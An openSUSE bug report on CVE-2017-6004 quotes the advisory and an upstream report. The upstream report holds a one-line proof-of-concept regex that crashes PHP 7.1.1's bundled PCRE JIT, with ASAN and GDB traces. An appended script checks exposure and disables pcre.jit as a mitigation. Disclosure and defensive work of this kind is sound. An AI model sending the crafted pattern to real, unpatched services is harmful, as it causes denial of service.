Bug ID 1025709
Summary VUL-0: CVE-2017-6004: php7: Segmentation fault in PHP7.1.1(bundled PCRE8.38)
Classification openSUSE
Product openSUSE Distribution
Version Leap 42.2
Hardware Other
OS Other
Status NEW
Severity Normal
Priority P5 - None
Component Security
Assignee security-team@suse.de
Reporter mikhail.kasimov@gmail.com
QA Contact qa-bugs@suse.de
Found By ---
Blocker ---

Ref: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6004
====================================================================
Original release date: 02/16/2017
Last revised: 02/16/2017
Source: US-CERT/NIST
Status: Awaiting Analysis (this vulnerability is currently awaiting analysis)
Overview

The compile_bracket_matchingpath function in pcre_jit_compile.c in PCRE through
8.x before revision 1680 (e.g., the PHP 7.1.1 bundled version) allows remote
attackers to cause a denial of service (out-of-bounds read and application
crash) via a crafted regular expression.
References to Advisories, Solutions, and Tools


External Source: CONFIRM
https://vcs.pcre.org/pcre/code/trunk/pcre_jit_compile.c?r1=1676&r2=1680&view=patch
External Source: CONFIRM
https://bugs.exim.org/show_bug.cgi?id=2035

====================================================================

From https://bugs.exim.org/show_bug.cgi?id=2035
====================================================================
Segmentation fault in php_src/ext/pcre/pcrelib/pcre_jit_compile.c:7336.

$ php -r "echo PCRE_VERSION;"
8.38 2015-11-23
$ php -v
PHP 7.1.1 (cli) (built: Feb 12 2017 15:35:23) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2017 Zend Technologies


Test script:
---------------
<?php
$pattern = "/(((?(?!))0(?1))(?''))/";
preg_match($pattern, "helloworld");
?>


Actual result:
--------------
ASAN Result:
==106214==ERROR: AddressSanitizer: SEGV on unknown address 0x60b000017fe0 (pc 0x000000750be8 bp 0x7ffe5a0aeb60 sp 0x7ffe5a0adf00 T0)
==106214==The signal is caused by a READ memory access.
   #0 0x750be7 in compile_bracket_matchingpath (/tmp/php+0x750be7)
   #1 0x70cf95 in compile_matchingpath (/tmp/php+0x70cf95)
   #2 0x750fe3 in compile_bracket_matchingpath (/tmp/php+0x750fe3)
   #3 0x70cf95 in compile_matchingpath (/tmp/php+0x70cf95)
   #4 0x711ebd in compile_recurse (/tmp/php+0x711ebd)
   #5 0x6fbe01 in _pcre_jit_compile (/tmp/php+0x6fbe01)
   #6 0x6e99ed in php_pcre_study (/tmp/php+0x6e99ed)
   #7 0x77b1ce in pcre_get_compiled_regex_cache (/tmp/php+0x77b1ce)
   #8 0x79aa23 in php_do_pcre_match (/tmp/php+0x79aa23)
   #9 0x78a61e in zif_preg_match (/tmp/php+0x78a61e)
   #10 0x1a52c81 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER (/tmp/php+0x1a52c81)
   #11 0x17c8be3 in execute_ex (/tmp/php+0x17c8be3)
   #12 0x17cae8a in zend_execute (/tmp/php+0x17cae8a)
   #13 0x15c0a84 in zend_execute_scripts (/tmp/php+0x15c0a84)
   #14 0x1351285 in php_execute_script (/tmp/php+0x1351285)
   #15 0x1c94879 in do_cli (/tmp/php+0x1c94879)
   #16 0x1c91ca0 in main (/tmp/php+0x1c91ca0)
   #17 0x7f98bd6d082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
   #18 0x43a768 in _start (/tmp/php+0x43a768)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/tmp/php+0x750be7) in compile_bracket_matchingpath


GDB backtrace:
#0  0x0000000000661138 in compile_bracket_matchingpath (common=0x7fffffffa5e8,
cc=0x1f04d4f "x", parent=0x7fffffffa870) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_jit_compile.c:7336
#1  0x000000000062aa23 in compile_matchingpath (common=0x7fffffffa5e8,
cc=<optimized out>, ccend=0x1f04d57 "x", parent=0x7fffffffa870) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_jit_compile.c:8497
#2  0x0000000000609e7c in compile_recurse (common=<optimized out>) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_jit_compile.c:9719
#3  _pcre_jit_compile (re=0x1f04d00, extra=0x1f04d70, mode=0) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_jit_compile.c:10223
#4  0x00000000005e97d5 in php_pcre_study (external_re=0x1f04d00, options=1,
errorptr=<optimized out>) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_study.c:1628
#5  0x00000000006ac7e9 in pcre_get_compiled_regex_cache (regex=0x7ffff3c71120)
at ext/pcre/php_pcre.c:518
#6  0x00000000006bf5dc in php_pcre_replace (regex=0x1f1b541, subject=<optimized
out>, subject_len=<optimized out>, replace_val=<optimized out>,
is_callable_replace=<optimized out>, limit=<optimized out>,
replace_count=<optimized out>, subject_str=<optimized out>) at
ext/pcre/php_pcre.c:1132
#7  php_replace_in_subject (regex=0x7ffff3c13230, replace=0x7ffff3c13240,
subject=<optimized out>, limit=-1, is_callable_replace=0,
replace_count=0x7fffffffabf4) at ext/pcre/php_pcre.c:1495
#8  0x00000000006be0ff in preg_replace_impl (return_value=0x7fffffffac78,
regex=0x7ffff3c13230, replace=0x7ffff3c13240, subject=0x7ffff3c13250,
limit_val=-1, is_callable_replace=0, is_filter=<optimized out>) at
ext/pcre/php_pcre.c:1554
#9  0x00000000006bb5ef in zif_preg_filter (execute_data=0x7ffff3c131e0,
return_value=0x7fffffffac78) at ext/pcre/php_pcre.c:1721
#10 0x00000000015ba4b5 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER
(execute_data=0x7ffff3c13030) at Zend/zend_vm_execute.h:628
#11 0x00000000014a7510 in execute_ex (ex=<optimized out>) at
Zend/zend_vm_execute.h:432
#12 0x00000000014a812b in zend_execute (op_array=0x7ffff3c7d000,
return_value=<optimized out>) at Zend/zend_vm_execute.h:474
#13 0x0000000001371f21 in zend_execute_scripts (type=<optimized out>,
retval=0x0, file_count=3) at Zend/zend.c:1474
#14 0x00000000011a84dc in php_execute_script (primary_file=0x7fffffffe218) at
main/main.c:2537
#15 0x00000000016a555d in do_cli (argc=<optimized out>, argv=<optimized out>)
at sapi/cli/php_cli.c:993
#16 0x00000000016a1dd9 in main (argc=<optimized out>, argv=<optimized out>) at
sapi/cli/php_cli.c:1381
====================================================================

https://software.opensuse.org/package/php7

Tumbleweed (TW): php7 7.0.15 (official repo)
Leap 42.2: php7 7.0.7 (official repo)

devel:languages:php repo: 7.1.1
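The crash above happens inside PCRE's JIT compiler, so exposure depends on two things a deployment can check for itself: whether the PCRE linked into PHP predates the fix, and whether PHP's JIT path (the pcre.jit ini directive, which drives the php_pcre_study call visible in both traces) is enabled. The following preflight script is an added example, not code from the bug report, PHP or PCRE. It assumes that the fix referenced by the advisory (PCRE trunk revision 1680) first shipped in PCRE 8.41; that cut-off is an assumption to confirm against the distribution changelog, since distributions backport fixes without bumping the version string.

```php
<?php
declare(strict_types=1);

// Added example (not part of the bug report): preflight check and runtime
// mitigation for CVE-2017-6004 on a PHP 7 host.
// ASSUMPTION: the fix (PCRE trunk r1680) first shipped in PCRE 8.41; anything
// older is treated as affected. Verify against your distribution's changelog.
const PCRE_FIXED_VERSION = '8.41';

/** Numeric part of PCRE_VERSION, e.g. "8.38" from "8.38 2015-11-23". */
function bundled_pcre_version(): string
{
    return explode(' ', PCRE_VERSION, 2)[0];
}

/** True when pcre.jit resolves to an enabled value ("1", "on", "yes", "true"). */
function pcre_jit_enabled(): bool
{
    return filter_var(ini_get('pcre.jit'), FILTER_VALIDATE_BOOLEAN);
}

/**
 * Builds the report. 'exposed' is true only when both conditions hold: an
 * unfixed PCRE and an active JIT. With pcre.jit=0 patterns never reach
 * pcre_jit_compile.c; they are studied and matched by the interpreter.
 */
function cve_2017_6004_report(): array
{
    $version = bundled_pcre_version();
    $oldPcre = version_compare($version, PCRE_FIXED_VERSION, '<');
    $jit     = pcre_jit_enabled();
    return [
        'pcre_version' => $version,
        'pcre_pre_fix' => $oldPcre,
        'jit_enabled'  => $jit,
        'exposed'      => $oldPcre && $jit,
    ];
}

/**
 * Stop-gap for processes that cannot be upgraded immediately: pcre.jit is
 * PHP_INI_ALL, so it can be switched off at runtime before any preg_* call.
 * Returns the resulting ini value so the caller can verify it took effect.
 */
function disable_pcre_jit(): string
{
    ini_set('pcre.jit', '0');
    return (string) ini_get('pcre.jit');
}

$report = cve_2017_6004_report();
printf("PCRE %s, pcre.jit %s -> %s\n",
    $report['pcre_version'],
    $report['jit_enabled'] ? 'on' : 'off',
    $report['exposed']
        ? 'EXPOSED: upgrade php7/PCRE, or disable pcre.jit until you can'
        : 'not exposed according to this check');

if ($report['exposed']) {
    // Apply the mitigation for this process and confirm it.
    echo "pcre.jit now set to ", disable_pcre_jit(), "\n";
}
```

Run it with the same binary the service uses (`php /path/to/check.php`), not a different CLI build: the 42.2 and Tumbleweed packages listed above link a different PCRE than the devel:languages:php 7.1.1 build with bundled 8.38, so the result is per binary. Disabling the JIT costs matching performance and is a bridge until the package is updated, not a replacement for it.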

